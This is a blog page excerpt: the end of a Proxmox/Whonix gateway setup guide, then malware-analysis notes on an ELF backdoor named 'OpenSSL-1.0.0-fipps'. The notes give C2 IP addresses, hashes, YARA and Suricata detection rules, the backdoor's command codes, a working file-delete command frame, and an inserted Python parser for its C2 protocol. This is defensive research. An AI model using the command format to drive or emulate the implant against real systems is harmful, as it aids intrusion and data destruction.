Since the Proxmox VM isn't behind NAT, it should match the network your Proxmox host is on.<p></p><p>This is the default:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhMwrj0CXxl3oI9gtqjzG1vbDxdoTlLA2Sq2OYNZpkfCMx32pYAT-uhkiXpSne8a-Swz2FXgRD_e3UxuRnkmF5e2YZyt4x_kU_4CNHZ2O0JXGZpp-ZaxDGDpKvvwdt55mPKzYp2jgnpcE8VeOkQyG2C9-AuKsXnT1_UrW3320Kh89ZGcRx5nUyYO9knXXs" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="328" data-original-width="544" height="193" src="https://blogger.googleusercontent.com/img/a/AVvXsEhMwrj0CXxl3oI9gtqjzG1vbDxdoTlLA2Sq2OYNZpkfCMx32pYAT-uhkiXpSne8a-Swz2FXgRD_e3UxuRnkmF5e2YZyt4x_kU_4CNHZ2O0JXGZpp-ZaxDGDpKvvwdt55mPKzYp2jgnpcE8VeOkQyG2C9-AuKsXnT1_UrW3320Kh89ZGcRx5nUyYO9knXXs" width="320" /></a></div>This is what I changed the configuration to:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhgzVdgfFCk-SRrfisMWX6C5xE4sRMfRQm0I3yXbHdgxmxhu57qupv3v2lRwzVLNjwJW4-Cvd94e7huyOVGoMshiCv1o-206rueARlqLxx-SYxg4CHA3R5zP0cOEWDUZB7K931LGpEOKUOIDQGzvkvK2PPBMtuBC8yi4YfbdLEB5BqKK8cZidIxvD95i9A" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="268" data-original-width="510" height="168" src="https://blogger.googleusercontent.com/img/a/AVvXsEhgzVdgfFCk-SRrfisMWX6C5xE4sRMfRQm0I3yXbHdgxmxhu57qupv3v2lRwzVLNjwJW4-Cvd94e7huyOVGoMshiCv1o-206rueARlqLxx-SYxg4CHA3R5zP0cOEWDUZB7K931LGpEOKUOIDQGzvkvK2PPBMtuBC8yi4YfbdLEB5BqKK8cZidIxvD95i9A" width="320" /></a></div><p>Reboot the VM.</p><p>Log in and run the "ip a" command to ensure that the Whonix interface has the 10.152.152.10 IP and eth0 has a real IP on your normal network. 
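</p><p>The checks in this section, the bridge created under "Proxmox Network Preparation" and the "Attaching a VM or Container" step later in the post all reduce to one invariant on the Proxmox host: the gateway has net0 on vmbr0 and net1 on the Whonix bridge, and every guest that is supposed to go through Tor has no NIC on anything but the Whonix bridge. The following is an added example (mine, not the post's or Whonix's code) that checks that invariant from the text that qm config / pct config print. The bridge names vmbr0/vmbr2, the /18 netmask (Whonix's default 255.255.192.0), the function names and the sample config dumps are all assumptions, labelled in the code.</p>

```python
"""Added example, not part of the post: post-setup checks for the Whonix Gateway wiring
described above, run on the Proxmox host.

Assumptions taken from the post: the Whonix bridge is vmbr2, the gateway's uplink is vmbr0,
and the gateway answers on 10.152.152.10. Function names and the sample config dumps are
mine; the dumps are constructed in the format `qm config` / `pct config` print.
"""
import ipaddress
import re
import subprocess

WHONIX_BRIDGE = "vmbr2"
UPLINK_BRIDGE = "vmbr0"
GATEWAY_IP = "10.152.152.10"

NET_LINE = re.compile(r"^net(\d+):\s*(.*)$")


def parse_nics(config_text):
    """Map NIC index -> option dict for every netN line of a qm/pct config dump."""
    nics = {}
    for line in config_text.splitlines():
        m = NET_LINE.match(line.strip())
        if not m:
            continue
        opts = {}
        for item in m.group(2).split(","):
            key, _, value = item.partition("=")
            opts[key.strip()] = value.strip()
        nics[int(m.group(1))] = opts
    return nics


def gateway_wiring_ok(config_text):
    """The gateway needs exactly net0 on the uplink and net1 on the Whonix bridge,
    matching the eth0 (uplink) / eth1 (10.152.152.10) assignment made inside the VM."""
    nics = parse_nics(config_text)
    return (set(nics) == {0, 1}
            and nics[0].get("bridge") == UPLINK_BRIDGE
            and nics[1].get("bridge") == WHONIX_BRIDGE)


def guest_is_tor_only(config_text):
    """True when a workstation guest has at least one NIC and every NIC is on the Whonix
    bridge. A second NIC on vmbr0 would give the guest a path that bypasses the gateway."""
    nics = parse_nics(config_text)
    return bool(nics) and all(o.get("bridge") == WHONIX_BRIDGE for o in nics.values())


def container_route_ok(config_text):
    """For a container (pct keeps ip=/gw= in the config): the address must be static,
    the gateway must be the Whonix gateway, and it must lie in the container's own subnet."""
    for opts in parse_nics(config_text).values():
        ip, gw = opts.get("ip", ""), opts.get("gw", "")
        if ip in ("", "dhcp", "manual") or gw != GATEWAY_IP:
            return False
        if ipaddress.ip_address(gw) not in ipaddress.ip_interface(ip).network:
            return False
    return True


def live_config(tool, vmid):
    """Read the current config from the host; tool is 'qm' for VMs or 'pct' for containers."""
    out = subprocess.run([tool, "config", str(vmid)], capture_output=True, text=True, check=True)
    return out.stdout


# Constructed sample dumps (not captured from a real host); MAC addresses are placeholders.
GATEWAY_CFG = """\
boot: order=scsi0
memory: 1024
name: whonix-gateway-cli
net0: virtio=BC:24:11:00:00:01,bridge=vmbr0,firewall=1
net1: virtio=BC:24:11:00:00:02,bridge=vmbr2,firewall=1
scsi0: local-lvm:vm-100-disk-0,size=100G
"""
CT_CFG_OK = ("net0: name=eth0,bridge=vmbr2,hwaddr=BC:24:11:00:00:10,"
             "ip=10.152.152.11/18,gw=10.152.152.10,type=veth\n")
CT_CFG_LEAK = CT_CFG_OK + "net1: name=eth1,bridge=vmbr0,hwaddr=BC:24:11:00:00:11,ip=dhcp,type=veth\n"

if __name__ == "__main__":
    # On the host you would feed live_config("qm", 100) / live_config("pct", <ctid>) instead.
    print("gateway wiring:", gateway_wiring_ok(GATEWAY_CFG))
    print("container ok:", guest_is_tor_only(CT_CFG_OK) and container_route_ok(CT_CFG_OK))
    print("container leak:", guest_is_tor_only(CT_CFG_LEAK))
```

<p>For a VM (qm) the static address lives inside the guest rather than in the config, so only the bridge check applies there; the ip=/gw= check is meaningful for containers, where Proxmox writes the address into the pct config.</p><p>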
Check the MAC address to make sure it matches the hardware you have attached.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEijDL7nvo-bItw6tPuN0ffzzd_x96gOdEz4WIjrd-G_Z5itBFZADBonhX-I0-deekJI4q9hoRwNA9AuhTKjdhDHIjeQRoh0FjId31eepIldBkPIkaFzWTHkfUFPuTN6JOskk3iFE3UxeBq_S7yIrPoTrdIk4jJlYIUTPlnkLNOwWZEtyr4ggeE-oDTA2eg" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="436" data-original-width="920" height="215" src="https://blogger.googleusercontent.com/img/a/AVvXsEijDL7nvo-bItw6tPuN0ffzzd_x96gOdEz4WIjrd-G_Z5itBFZADBonhX-I0-deekJI4q9hoRwNA9AuhTKjdhDHIjeQRoh0FjId31eepIldBkPIkaFzWTHkfUFPuTN6JOskk3iFE3UxeBq_S7yIrPoTrdIk4jJlYIUTPlnkLNOwWZEtyr4ggeE-oDTA2eg=w453-h215" width="453" /></a></div><br />Run "sudo systemcheck" to make sure you're connected to tor.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEizzW09F8AOVmasTAej_TGAxEgoXFRHHMMjOx5KLM9-3aCeNAzBIW7vI6ba1ZEixmZLLIqTe_hv4utz75_eghEFK9rlzjn_OKZF8BPUoWWGbqOBMxJui2sav7PNzplISV1-c8lz7YJBGg_rwtoviSMmHtLC9MI0O2o4czyEQLDUAyQ9_m4u96Re5IcBBGk" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="282" data-original-width="604" height="149" src="https://blogger.googleusercontent.com/img/a/AVvXsEizzW09F8AOVmasTAej_TGAxEgoXFRHHMMjOx5KLM9-3aCeNAzBIW7vI6ba1ZEixmZLLIqTe_hv4utz75_eghEFK9rlzjn_OKZF8BPUoWWGbqOBMxJui2sav7PNzplISV1-c8lz7YJBGg_rwtoviSMmHtLC9MI0O2o4czyEQLDUAyQ9_m4u96Re5IcBBGk" width="320" /></a></div><br />Check your IP and make sure it's not your IP.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjJMWJpC11W6ZJfA6-qrZ6S8ao3rTOiSn1q2KNQIA4QSN-eYLvVi-5CEX_qx8L3-LP7ztvjuRMVD2rA8Fmwlz8MNeb3ZUIboTCEHzGCH9L-5v6XBlssF8VA90Dy195nS9teQ5bgSOPbKW6MDiJZqgvCtVa8UxIrxMgp1X9aaCbus7qPbdvspZvW5szp4PY" style="margin-left: 1em; 
margin-right: 1em;"><img alt="" data-original-height="216" data-original-width="600" height="115" src="https://blogger.googleusercontent.com/img/a/AVvXsEjJMWJpC11W6ZJfA6-qrZ6S8ao3rTOiSn1q2KNQIA4QSN-eYLvVi-5CEX_qx8L3-LP7ztvjuRMVD2rA8Fmwlz8MNeb3ZUIboTCEHzGCH9L-5v6XBlssF8VA90Dy195nS9teQ5bgSOPbKW6MDiJZqgvCtVa8UxIrxMgp1X9aaCbus7qPbdvspZvW5szp4PY" width="320" /></a></div><br />Reboot the VM.<br /><br /><p></p><p><b>Attaching a VM or Container</b></p><p>I'm attaching a container to the whonix network but you pretty much do the same with VM but static IP assignment needs to be done inside the VM rather than proxmox webui. Check whonix docs and links below.</p><p>I have created an Ubuntu container with the following network settings</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgD8n05ircNTAg49yj9-KFnRQRf2dLy31wTsYyVUE1nJM5YPTlWoHtpCSAW3fDb_9CqaJo2JLI7-h10Ti8P-YlThFpVGVrxqAhTxvAdZCXRrgIurp1qqQs5Jmb6ZdkJZ6xPnFZJkqKexe6tiehhWn6FSYgEHPbBZRmWRNn9bQykQ9JaEjM_cosrj_Xy66U" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="760" data-original-width="1344" height="218" src="https://blogger.googleusercontent.com/img/a/AVvXsEgD8n05ircNTAg49yj9-KFnRQRf2dLy31wTsYyVUE1nJM5YPTlWoHtpCSAW3fDb_9CqaJo2JLI7-h10Ti8P-YlThFpVGVrxqAhTxvAdZCXRrgIurp1qqQs5Jmb6ZdkJZ6xPnFZJkqKexe6tiehhWn6FSYgEHPbBZRmWRNn9bQykQ9JaEjM_cosrj_Xy66U=w385-h218" width="385" /></a></div><p>Check IP</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjYCsQfdYF2H0PpwzUxkENfA4p8pxfht5ZmJfoC7veoP3Ftgz0EVSxhMz-j7A8uqmhQxuRwT-9k6CNb_ab_1qelYISJ_GawvzABGlBSXM070fnrxPMZyWPlJcOgZDlNa37sDyqnoXFX5aDd6POn2o6JtOHw425db24o72_B83jet-3Yy2rCyueG9VYKXJ0" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="226" data-original-width="822" height="88" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEjYCsQfdYF2H0PpwzUxkENfA4p8pxfht5ZmJfoC7veoP3Ftgz0EVSxhMz-j7A8uqmhQxuRwT-9k6CNb_ab_1qelYISJ_GawvzABGlBSXM070fnrxPMZyWPlJcOgZDlNa37sDyqnoXFX5aDd6POn2o6JtOHw425db24o72_B83jet-3Yy2rCyueG9VYKXJ0" width="320" /></a></div><p></p><div><br /></div><div><b>End</b></div><div><br /></div><div>Have fun researching threats & malware!</div><br /><p></p><p><b>Links</b></p><p><a href="https://www.whonix.org/">https://www.whonix.org/</a></p><p><a href="https://www.whonix.org/wiki/VirtualBox#CLI">https://www.whonix.org/wiki/VirtualBox#CLI</a></p><p><a href="https://www.whonix.org/wiki/Documentation">https://www.whonix.org/wiki/Documentation</a></p><p><a href="https://www.whonix.org/wiki/Other_Operating_Systems">https://www.whonix.org/wiki/Other_Operating_Systems</a></p><p><a href="https://malware.news/t/setting-up-whonix-gateway-in-vmware-workstation/61279">https://malware.news/t/setting-up-whonix-gateway-in-vmware-workstation/61279</a> </p></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-81910607813003214162022-11-29T14:39:00.000-08:002022-11-29T14:39:07.321-08:00OpenSSL-1.0.0-fipps Linux Backdoor - Notes<h2 style="text-align: left;">Introduction:</h2><div>In some security/malware chat room, someone posted about an ELF backdoor, at the time, I couldn't find much information about it and any related samples or reports. Few weeks ago, I saw similar sample being discussed on twitter, which was found by a researcher in an open directory.</div><div><br /></div><div>In this post, I just have some notes on my analysis/research of this sample and related samples. This might help with writing a signature or doing further research. I'm just calling this OpenSSL-1.0.0-fipps backdoor since that's what it initially sends to the C2 server and "fipps" has an extra p. 
</div><div><br /></div><div>As far as I'm aware, I haven't found similar samples with the searches I've done, and I have not seen any samples successfully connect to C2 on any public sandboxes. I was also not able to find any executables for the C2 with some of the yara rules I wrote and queried Hybrid-Analysis for.</div><h2 style="text-align: left;">Notes:</h2><div>It's a reverse shell/backdoor. The binary reaches out to the C2 IP and port defined in the binary. You can find the C2 IP by just running strings.</div><div><br /></div><div><b>Samples:</b></div><div><b>MD5 hashes:</b></div><div><div>eb7ba9f7424dffdb7d695b00007a3c6d VT: First Submission 2022-04-21 18:44:09 UTC, submission name: suspicious</div><div>97f352e2808c78eef9b31c758ca13032 VT: First Submission 2022-08-26 22:47:54 UTC, submission name: client</div><div>3e9ee5982e3054dc76d3ba5cc88ae3de VT: First Submission 2022-11-04 00:18:27 UTC, submission name: client</div></div><div><br /></div><div><b>Sha256 hashes:</b></div><div><div>8cd16feb7318c0de3027894323a0ccaacb527e071aa4c4b691feb411b6bd0937</div><div>40da2329b2b81f237fc30d2274529e6fda4364516b78b4b88659c572fbc4bc02</div><div>4e5e42b1acb0c683963caf321167f6985e553af2c70f5b87ec07cc4a8c09b4d8</div></div><div><br /></div><div><b>C2s:</b></div><div>162.220.10.214</div><div>107.175.64.203</div><div>185.29.10.38</div><div><br /></div><div>After doing some historic searches, the C2's were running Windows, not that it matters much.</div><div><br /></div><div><b>TELFhash</b> for the binaries is: t1afe0d814d67c0dad4ab20c30d4989a94a047eb2688752922ab98d9c1883d917f15cf5f</div><div><br /></div><div><b>File command results & diff:</b></div><div><div>ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, BuildID[sha1]=<b>16eee120b0a557907a782d1405c8f86415902fa5</b>, stripped</div><div>ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter 
/lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, BuildID[sha1]=<b>16eee120b0a557907a782d1405c8f86415902fa5</b>, stripped</div><div>ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, BuildID[sha1]=2c46d3c40075dc7a193f8041f9458b40fd1f31cf, stripped</div></div><div><br /></div><div>The BuildID is the same for eb7ba9f7424dffdb7d695b00007a3c6d and 97f352e2808c78eef9b31c758ca13032, and the only diff is the IP:</div><div><br /></div><pre>< 00004110: 0000 0000 0000 0000 3130 372e 3137 352e ........107.175.
< 00004120: 3634 2e32 3033 0067 6574 6966 6164 6472 64.203.getifaddr
---
> 00004110: 0000 0000 0000 0000 3136 322e 3232 302e ........162.220.
> 00004120: 3130 2e32 3134 0067 6574 6966 6164 6472 10.214.getifaddr</pre><div><br /></div><div>Not 100% sure about the reason for this, why someone modified just the IP and why it wasn't recompiled.</div><div><br /></div><div><br /></div><div>eb7ba9f7424dffdb7d695b00007a3c6d was the sample being discussed in a chat room; the user mentioned that the file was dropped after log4j exploitation. </div><div><br /></div><div>The most recent sample 3e9ee5982e3054dc76d3ba5cc88ae3de was found in an open directory. Here's the tweet regarding it: <a href="https://twitter.com/r3dbU7z/status/1588337205595951106">https://twitter.com/r3dbU7z/status/1588337205595951106</a> In the reply tweet below (<a href="https://twitter.com/1ZRR4H/status/1588398704913895425">https://twitter.com/1ZRR4H/status/1588398704913895425</a> ) the user mentions finding a webshell as well. Maybe the threat actor is initially gaining access through external web vulns. I'm not really sure.</div><div><br /></div><div>Finally, there is 97f352e2808c78eef9b31c758ca13032 and I'm not sure where it came from. 
The sample was discovered after searching for the following <b>yara rule </b>on Hybrid Analysis:</div><div><br /></div><pre>rule elf_backdoor_fipps
{
    strings:
        $a = "found mac address"
        $b = "RecvThread"
        $c = "OpenSSL-1.0.0-fipps"
        $d = "Disconnected!"
    condition:
        (all of them) and uint32(0) == 0x464c457f
}</pre><div><br /></div><div>(there is also "dbus-statd", which appears in all the binaries)</div><div><br /></div><div>There is also a <b>Suricata signature </b>published by Proofpoint/Emerging Threats:</div><div><br /></div><pre>alert tcp any any -> any 443 (msg:"ET MALWARE Malicious ELF Activity"; dsize:<50; content:"OpenSSL-1.0.0-fipps"; startswith; fast_pattern; reference:md5,eb7ba9f7424dffdb7d695b00007a3c6d; classtype:trojan-activity; sid:2036592; rev:1; metadata:affected_product Mac_OSX, affected_product Linux, attack_target Client_Endpoint, created_at 2022_05_12, deployment Perimeter, former_category MALWARE, signature_severity Major, tag RAT, updated_at 2022_05_12;)</pre><div><br /></div><div>The Suricata signature above is for the initial connection from the backdoor to the C2 server.</div><div>When the sample runs, it prints "!!!Hello World!!!" 
and the mac address it found, connects to the C2 server, sends OpenSSL-1.0.0-fipps and the mac address.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjITZ3Ccb3v7WCvwS95MM80Pm7xmUJ7cWP57l_Bbt5F9GGUoTCaBjzobhjo4qnwY9NE1bc3y3GqI8w0zc0U3U7fahm3xrw_yxx8avvuGwKQns857SSHGCO-xNsMIfMV-XptoApbicBwPJatV0yR8CQY62cQqNwYycyFTh_gh_QnTc0YFEoqiY2IeU-y" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="486" data-original-width="1252" height="155" src="https://blogger.googleusercontent.com/img/a/AVvXsEjITZ3Ccb3v7WCvwS95MM80Pm7xmUJ7cWP57l_Bbt5F9GGUoTCaBjzobhjo4qnwY9NE1bc3y3GqI8w0zc0U3U7fahm3xrw_yxx8avvuGwKQns857SSHGCO-xNsMIfMV-XptoApbicBwPJatV0yR8CQY62cQqNwYycyFTh_gh_QnTc0YFEoqiY2IeU-y=w400-h155" width="400" /></a></div><br />There also appears to be I guess a heartbeat packet which looks like this:</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi1pbvb7BuXvr4pAGW1OtnFQH6I9MqC08HQVYzl-KAcq0DHb6rj2NOcHZmwo-3wDgdPEhhk_ltWk-isAOkP9e3Nh75Xak8qB4pYk3V5_8zckrtM4ui76Y2xZlZA_ashFrGNV7MW8eBfd4vdiiV-YYlPFgLVe3R95YItkAZN2MoZeUU49Svzs4JWX_C3" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="264" data-original-width="1270" height="84" src="https://blogger.googleusercontent.com/img/a/AVvXsEi1pbvb7BuXvr4pAGW1OtnFQH6I9MqC08HQVYzl-KAcq0DHb6rj2NOcHZmwo-3wDgdPEhhk_ltWk-isAOkP9e3Nh75Xak8qB4pYk3V5_8zckrtM4ui76Y2xZlZA_ashFrGNV7MW8eBfd4vdiiV-YYlPFgLVe3R95YItkAZN2MoZeUU49Svzs4JWX_C3=w400-h84" width="400" /></a></div><br />Processing of commands takes place at FUN_00401f23 (i'm just using names ghidra assigns):</div><div><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEjn3Myun_VWGIUhV0yazpkuTpqRXvlPfFa0ZT9Xv13a8ULn9aaEuW1uRV2OgIZYEkifY6bCCJOIcBXid1Qm6WLCnItzd9-3NccWJiZpmni-Iz39a2GvDn6wlSLao_a1PqWPMZJ55strH2Ha0kQFo-ARdYLBvdao-D4GAGjq_s6_R5NV1XLTzLw8S70m" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1102" data-original-width="1252" height="563" src="https://blogger.googleusercontent.com/img/a/AVvXsEjn3Myun_VWGIUhV0yazpkuTpqRXvlPfFa0ZT9Xv13a8ULn9aaEuW1uRV2OgIZYEkifY6bCCJOIcBXid1Qm6WLCnItzd9-3NccWJiZpmni-Iz39a2GvDn6wlSLao_a1PqWPMZJ55strH2Ha0kQFo-ARdYLBvdao-D4GAGjq_s6_R5NV1XLTzLw8S70m=w640-h563" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEibv0TsJahKmPVSNoxZG_gQ-WsH_PzJMZaBp2i9WIf3r-qQ7JC3-nP27tP8N5BD0jNO5SpqedhUOLTRtsdmdOs26tCkBiXIOq77QYKcxTGEG2TZ76MyJ0V3vAX9JhM8J47masfhhKEGs1e1eCyqOiugih7_KWA7qyAQ8KLZFafk1zspThkE7VUt3Kx3" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="768" data-original-width="1208" height="406" src="https://blogger.googleusercontent.com/img/a/AVvXsEibv0TsJahKmPVSNoxZG_gQ-WsH_PzJMZaBp2i9WIf3r-qQ7JC3-nP27tP8N5BD0jNO5SpqedhUOLTRtsdmdOs26tCkBiXIOq77QYKcxTGEG2TZ76MyJ0V3vAX9JhM8J47masfhhKEGs1e1eCyqOiugih7_KWA7qyAQ8KLZFafk1zspThkE7VUt3Kx3=w640-h406" width="640" /></a></div><br />The binary is stripped and I wasn't able to figure out every single function or execute every single function but it has typical backdoor capabilities and it's also able to gather some info and send it back to the C2. There also seems to be encoding of the output (by FUN_00402181 ??) before it gets sent via network. 
</div><div><br /></div><div>1: grab user and system info</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgs0KEmAFpbPTAJlxvD7Vi4PsSe05CUyclI-Z_M8lCv8k7NxTVCRgTO4UkmHkLqQn9mqILlUnnntc0Q53oSTMOemjvcy7xF2i9BhdITB8gvx9Yn99C81WeG7TSewcq6Cz75ufF4H3mkSJ8OlVF0asY0VlolPLYZhbPA2luMTF9_cLPEypvaN7lpSonj" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="130" data-original-width="698" height="60" src="https://blogger.googleusercontent.com/img/a/AVvXsEgs0KEmAFpbPTAJlxvD7Vi4PsSe05CUyclI-Z_M8lCv8k7NxTVCRgTO4UkmHkLqQn9mqILlUnnntc0Q53oSTMOemjvcy7xF2i9BhdITB8gvx9Yn99C81WeG7TSewcq6Cz75ufF4H3mkSJ8OlVF0asY0VlolPLYZhbPA2luMTF9_cLPEypvaN7lpSonj" width="320" /></a></div><br />3: shell?</div><div>5: write file?</div><div>7: not sure</div><div>0xb: delete a file</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjL9I0wDhLrDZBq9GMJdZg06t_rSUVizqyI1Tt1ziTRtpjk73Oy7CY5GPOD86wntDQtcAQ_84q2BYq34Ki4W5KGRFR1lZyuwYeMQ4XrOI-dkk_JEHbwJWvxRyMjlAWtej5EuBa0DzCkCuALc9nNuGuuTvsg8FuQAAHAurXW3Sxx_RQ8mYTGDAy8XTfx" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="264" data-original-width="744" height="114" src="https://blogger.googleusercontent.com/img/a/AVvXsEjL9I0wDhLrDZBq9GMJdZg06t_rSUVizqyI1Tt1ziTRtpjk73Oy7CY5GPOD86wntDQtcAQ_84q2BYq34Ki4W5KGRFR1lZyuwYeMQ4XrOI-dkk_JEHbwJWvxRyMjlAWtej5EuBa0DzCkCuALc9nNuGuuTvsg8FuQAAHAurXW3Sxx_RQ8mYTGDAy8XTfx" width="320" /></a></div>0xd: directory/file listing?</div><div>0xf: not sure</div><div>0x11: not sure</div><div>0x13: not sure</div><div>0x17: seems to return c2 connection info</div><div><br /></div><div>It does have functions for doing network connections, killing processes, etc...</div><div><br /></div><div>From doing some testing, the command input that it expects seems to be 16 bytes. 
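</div><p>The 16-byte command layout described here, together with the command table above and the delete-file bytes given next, is enough to write a small frame parser for captured C2-to-implant traffic. The following is an added example (mine, not code from the notes or from the sample) that does that and also reproduces the dsize/startswith test of the quoted ET rule so a triage script can tag the initial beacon. The header offsets come from the notes; reading the size as little-endian, treating bytes 12..15 as an opaque trailer, and the sample beacon with a placeholder MAC are my assumptions, marked in the code.</p>

```python
"""Added example, not from the notes above: a parser for the C2-to-implant framing the notes
describe, usable for a Suricata/Zeek follow-up or for a lab-only fake C2 when a sample is run
in an isolated sandbox.

Layout taken from the notes: a 16-byte header, command byte at offset 8, secondary command
byte at offset 9, 2-byte payload size at offset 10, then the payload. Reading the size as
little-endian and treating bytes 12..15 as an opaque trailer are my assumptions; the notes
only confirm the 0x0b/0x05 "delme" example. The command names repeat the notes' guesses.
"""
import struct

BANNER = b"OpenSSL-1.0.0-fipps"
HEADER_LEN = 16

# Command ids from the notes; '?' marks the notes' own tentative readings.
COMMANDS = {
    0x01: "grab user and system info",
    0x03: "shell?",
    0x05: "write file?",
    0x07: "not sure",
    0x0b: "delete a file",
    0x0d: "directory/file listing?",
    0x0f: "not sure",
    0x11: "not sure",
    0x13: "not sure",
    0x17: "return c2 connection info",
}


def matches_et_beacon(payload: bytes) -> bool:
    """Same test as the ET rule quoted above: fewer than 50 bytes, starting with the banner."""
    return len(payload) < 50 and payload.startswith(BANNER)


def parse_frame(data: bytes):
    """Parse one frame from the start of `data`; return (fields, remaining bytes)."""
    if len(data) < HEADER_LEN:
        raise ValueError("need %d header bytes, got %d" % (HEADER_LEN, len(data)))
    cmd, sub, size = struct.unpack_from("<BBH", data, 8)   # offsets 8, 9, 10..11
    end = HEADER_LEN + size
    if len(data) < end:
        raise ValueError("payload truncated: header says %d bytes" % size)
    fields = {
        "prefix": data[:8],          # affects processing/encoding per the notes; kept opaque
        "command": cmd,
        "name": COMMANDS.get(cmd, "unknown"),
        "subcommand": sub,
        "size": size,
        "trailer": data[12:16],      # assumption: opaque, all zero in the notes' example
        "payload": data[HEADER_LEN:end],
    }
    return fields, data[end:]


def parse_stream(data: bytes):
    """Split a captured C2->implant byte stream into consecutive frames."""
    frames = []
    while data:
        fields, data = parse_frame(data)
        frames.append(fields)
    return frames


def describe(fields) -> str:
    """One-line summary suited to an alert or a triage note."""
    return "cmd=0x%02x (%s) sub=0x%02x size=%d payload=%r" % (
        fields["command"], fields["name"], fields["subcommand"], fields["size"], fields["payload"])


# Constructed samples: the exact delete-file frame from the notes, an info request,
# and a beacon with a placeholder MAC address (not a real capture).
DELETE_FRAME = b"\x00" * 8 + b"\x0b\x00" + b"\x05\x00" + b"\x00" * 4 + b"delme"
INFO_FRAME = b"\x00" * 8 + b"\x01\x00" + b"\x00\x00" + b"\x00" * 4
SAMPLE_BEACON = BANNER + b" 00:11:22:33:44:55"

if __name__ == "__main__":
    print("beacon matches ET rule:", matches_et_beacon(SAMPLE_BEACON))
    for f in parse_stream(DELETE_FRAME + INFO_FRAME):
        print(describe(f))
```

<p>Because the ET rule keys only on the banner in a short first packet, the frame parser is the piece that lets you tell a bare check-in from an operator actually issuing commands, which is the distinction an incident responder wants from a pcap of this traffic.</p><div>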
The following worked for me for deleting a file:</div><div><code>\x00\x00\x00\x00\x00\x00\x00\x00\<b>x0b\x00 (command) \x05\x00 (input size)</b>\x00\x00\x00\x00delme</code></div><div>0b is the command (the byte next to 0b is supposed to be the secondary command if that function supports it) and 05 is the number of bytes to read afterwards; delme is 5 bytes.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEglxH9adete7SjxNCo5iA5a5qtBHjLpdED5qTsQC9-R_Rq_vD7ZuwGAr3POLOZHJJSnEvXZ9iU9MqOUnGRONuj-nMkCumPpiE9QZREr30amLlE-Wo6-V-tWpxZuZz_3sEXIYK66EsN9WemLhK9IIxQoBE8_glEP_UKG6oC1geQcMDlOsvi3Cg6EbaKW" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1142" data-original-width="3164" height="230" src="https://blogger.googleusercontent.com/img/a/AVvXsEglxH9adete7SjxNCo5iA5a5qtBHjLpdED5qTsQC9-R_Rq_vD7ZuwGAr3POLOZHJJSnEvXZ9iU9MqOUnGRONuj-nMkCumPpiE9QZREr30amLlE-Wo6-V-tWpxZuZz_3sEXIYK66EsN9WemLhK9IIxQoBE8_glEP_UKG6oC1geQcMDlOsvi3Cg6EbaKW=w640-h230" width="640" /></a></div><br /></div><div>I'm not sure about the impact of changing other values in that 16-byte input, but I know it changes the way the backdoor processes the input & encodes it (first 8 bytes).</div><div><br /></div><div><br /></div><h3 style="text-align: left;">Conclusion:</h3><div>It's a weird backdoor that I haven't found much info about, nor have I seen it fully run in a sandbox while connected to its C2. </div><div><br /></div><div>I assume it's being used after initial access through a web/external vulnerability (according to the tweets related to the latest sample, the threat actor had some usernames and active directory info they had taken from an organization they breached), but I'm not sure, as there aren't many samples (or reports) I was able to find with the TELFhash and yara rule I made. It's very easy for the threat actor to modify the strings in the binary. 
